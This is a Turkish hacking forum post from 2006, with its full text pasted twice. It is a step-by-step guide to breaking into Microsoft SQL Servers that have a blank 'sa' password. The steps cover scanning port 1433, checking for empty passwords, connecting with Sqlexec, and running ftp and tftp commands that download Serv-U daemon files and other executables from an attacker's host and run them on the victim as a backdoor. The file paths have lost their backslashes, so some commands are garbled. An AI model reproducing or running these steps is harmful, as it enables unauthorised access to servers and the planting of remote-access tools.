- 22 Mar 2006
- 14
- 1
SQLServer HACKLeme
Gerekli Materyaller:
SQL Scanner
SERV-U
Sqlexec
TFTP
Eveet Bu Yukarda Yazdiklarim Nedir Ne Ise Yarar Birazdan Görecegiz.
a) Ilk Önce Serv-u Yu Ayarlayip Portunu 4 Rakamli Konuma Getirecegiz. Örnek: 3275
b) SQL Scan Result Örnegin Su Sekilde Görünür: 127.0.0.1 Found Mssql account: sa/[Null]
Burdaki Gördügümüz "sa" Username "[Null]" ise Password\'dur. "[Null]" Bu Password Belirtilmemis Demektir.
c) Sqlexec\'i Aynen Bu Sekilde Ayarliyoruz. Username: sa Password: [Null]
d) Serv-u Icin Bir Path Yani Dizin Buluyoruz.
e) TFTP\'yi Kendi Bilgisayarimizda Calistiriyoruz.
f) SQL\'de Normal DOS Komutlari Gecerlidir. Dolayisiyla DOS Komutlariyla Calisacagiz.
g) c:winntsystem32 ftp.exe -i 172.185.14.77 get serv-u.ini c:Buraya Path serv-u.ini << Yazacagiz. Yani Serv-u.ini nin Yolunu Yazacagiz. Bu Komutla Serv-u.ini\'yi Aliyoruz.
h) c:winntsystem32 ftp.exe -i 172.185.14.77 get serv-u.exe c:Buraya Path serv-u.exe << Yazacagiz. Yani Serv-u.exe nin Yolunu Yazacagiz.
i) Sonra DirServ-u.exe Yaziyoruz. Bu Komutla Serv-u.exe\'mizi Calistiririz.
1) Scan Ve RecHecken:
Ilk Önce SQL Server Bulabilmemiz Icin SQL Server Scanner Bulmamiz Gerek. Bunu "Sfind.exe" Adli Programla Yapabiliriz. SQL Server\'lerin Port\'u 1433\'dür. Bununla Beraber Scan Yapiyoruz.
Scan Olayi Bittikten Sonra Scanner\'imiz Bize Bir Yigin IP Adresi Verecektir. Sifre Bulabilmemiz Icin Bu IP Adreslerini RecHecken Yapmamiz Lazim. Su Sekilde:
"SQLLHF.exe" Adli Dosyayi HDD\'mizin C Sürücüsüne Kopyeliyoruz. Sonra "Check_1.bat" Isimli Dosyayi HDD\'mizin C Sürücüsüne Kopyeliyoruz. Ayni Sekilde "Sfind.exe" Adli Scanner\'imize Ait Olan "Sfind.txt" Dosyasida C Sürücüsünde Olmalidir.
Sonra DOS\'u Aciyoruz Ve "Check_1.bat Dosyasini Calistiriyoruz. O Otomatik Olarak Sfind.txt\'deki IP\'lere Ping Atacak. Bu Islem Yaklasik 5 Dakika Sürecektir.
Bu Arada Biz, Koydugumuz Cay Suyuna Bakiyoruz Ve Cayimizi Demliyoruz. Cayimizi Yudumlayarak Islemlerimize Devam Ediyoruz Smiley)))
PING Olayi Bitti. Simdi Sonuclara Bakiyoruz. Örnegin: "Checking 127.xxx.xx.xx ::: Password not guessed" Su Sekilde Bir Yazi Varsa Bu Serveri Hackleyemeyiz. Ama Su Sekilde Olursa: "Checking 127.xxx.xx.xx ::: Password is blank!! <---- WARNING!" Iste O Zaman Hackleyebiliriz Demektir Smiley
2) Connecting Yani Hacking
"Sqlexec.exe" Adli Tool\'umuzu Calistiriyoruz. Buldugumuz IP Adresini Giriyoruz. Username\'yi Her Halukarda sa Olarak Ve Password\'u Blank Olarak Giriyoruz.
Simdi Asagiya "dir c:" Komutunu Veriyoruz. Veeee SQL Server\'in C Sürücüsüne Girmis Oluyoruz Smiley))
Serv-u Dosyalarini TFTP\'ye Yüklemek Icin Su Komutlari Verebiliriz (IP Adresini Örnek Olarak Veriyorum):
tftp.exe -i 127.0.0.1 GET Servudaemon.exe c:server.exe
tftp.exe -i 127.0.0.1 GET TzoLibr.dll c: TzoLibr.dll
tftp.exe -i 127.0.0.1 GET winmgnt.exe c:winmgnt.exe
tftp.exe -i 127.0.0.1 GET httpodbc.dll c:httpodbc.dll
tftp.exe -i 127.0.0.1 GET ServUDaemon.ini c:ServUDaemon.ini
tftp.exe -i 127.0.0.1 GET speed.exe c:windowssystem32speed.exe ? ?
tftp.exe -i 127.0.0.1 GET 1.txt c:windowssystem321.txt )____ Huh??
tftp.exe -i 127.0.0.1 GET 2.txt c:windowssystem322.txt )
ALINTIDIR...!
Gerekli Materyaller:
SQL Scanner
SERV-U
Sqlexec
TFTP
Eveet Bu Yukarda Yazdiklarim Nedir Ne Ise Yarar Birazdan Görecegiz.
a) Ilk Önce Serv-u Yu Ayarlayip Portunu 4 Rakamli Konuma Getirecegiz. Örnek: 3275
b) SQL Scan Result Örnegin Su Sekilde Görünür: 127.0.0.1 Found Mssql account: sa/[Null]
Burdaki Gördügümüz "sa" Username "[Null]" ise Password\'dur. "[Null]" Bu Password Belirtilmemis Demektir.
c) Sqlexec\'i Aynen Bu Sekilde Ayarliyoruz. Username: sa Password: [Null]
d) Serv-u Icin Bir Path Yani Dizin Buluyoruz.
e) TFTP\'yi Kendi Bilgisayarimizda Calistiriyoruz.
f) SQL\'de Normal DOS Komutlari Gecerlidir. Dolayisiyla DOS Komutlariyla Calisacagiz.
g) c:winntsystem32 ftp.exe -i 172.185.14.77 get serv-u.ini c:Buraya Path serv-u.ini << Yazacagiz. Yani Serv-u.ini nin Yolunu Yazacagiz. Bu Komutla Serv-u.ini\'yi Aliyoruz.
h) c:winntsystem32 ftp.exe -i 172.185.14.77 get serv-u.exe c:Buraya Path serv-u.exe << Yazacagiz. Yani Serv-u.exe nin Yolunu Yazacagiz.
i) Sonra DirServ-u.exe Yaziyoruz. Bu Komutla Serv-u.exe\'mizi Calistiririz.
1) Scan Ve RecHecken:
Ilk Önce SQL Server Bulabilmemiz Icin SQL Server Scanner Bulmamiz Gerek. Bunu "Sfind.exe" Adli Programla Yapabiliriz. SQL Server\'lerin Port\'u 1433\'dür. Bununla Beraber Scan Yapiyoruz.
Scan Olayi Bittikten Sonra Scanner\'imiz Bize Bir Yigin IP Adresi Verecektir. Sifre Bulabilmemiz Icin Bu IP Adreslerini RecHecken Yapmamiz Lazim. Su Sekilde:
"SQLLHF.exe" Adli Dosyayi HDD\'mizin C Sürücüsüne Kopyeliyoruz. Sonra "Check_1.bat" Isimli Dosyayi HDD\'mizin C Sürücüsüne Kopyeliyoruz. Ayni Sekilde "Sfind.exe" Adli Scanner\'imize Ait Olan "Sfind.txt" Dosyasida C Sürücüsünde Olmalidir.
Sonra DOS\'u Aciyoruz Ve "Check_1.bat Dosyasini Calistiriyoruz. O Otomatik Olarak Sfind.txt\'deki IP\'lere Ping Atacak. Bu Islem Yaklasik 5 Dakika Sürecektir.
Bu Arada Biz, Koydugumuz Cay Suyuna Bakiyoruz Ve Cayimizi Demliyoruz. Cayimizi Yudumlayarak Islemlerimize Devam Ediyoruz Smiley)))
PING Olayi Bitti. Simdi Sonuclara Bakiyoruz. Örnegin: "Checking 127.xxx.xx.xx ::: Password not guessed" Su Sekilde Bir Yazi Varsa Bu Serveri Hackleyemeyiz. Ama Su Sekilde Olursa: "Checking 127.xxx.xx.xx ::: Password is blank!! <---- WARNING!" Iste O Zaman Hackleyebiliriz Demektir Smiley
2) Connecting Yani Hacking
"Sqlexec.exe" Adli Tool\'umuzu Calistiriyoruz. Buldugumuz IP Adresini Giriyoruz. Username\'yi Her Halukarda sa Olarak Ve Password\'u Blank Olarak Giriyoruz.
Simdi Asagiya "dir c:" Komutunu Veriyoruz. Veeee SQL Server\'in C Sürücüsüne Girmis Oluyoruz Smiley))
Serv-u Dosyalarini TFTP\'ye Yüklemek Icin Su Komutlari Verebiliriz (IP Adresini Örnek Olarak Veriyorum):
tftp.exe -i 127.0.0.1 GET Servudaemon.exe c:server.exe
tftp.exe -i 127.0.0.1 GET TzoLibr.dll c: TzoLibr.dll
tftp.exe -i 127.0.0.1 GET winmgnt.exe c:winmgnt.exe
tftp.exe -i 127.0.0.1 GET httpodbc.dll c:httpodbc.dll
tftp.exe -i 127.0.0.1 GET ServUDaemon.ini c:ServUDaemon.ini
tftp.exe -i 127.0.0.1 GET speed.exe c:windowssystem32speed.exe ? ?
tftp.exe -i 127.0.0.1 GET 1.txt c:windowssystem321.txt )____ Huh??
tftp.exe -i 127.0.0.1 GET 2.txt c:windowssystem322.txt )
ALINTIDIR...!
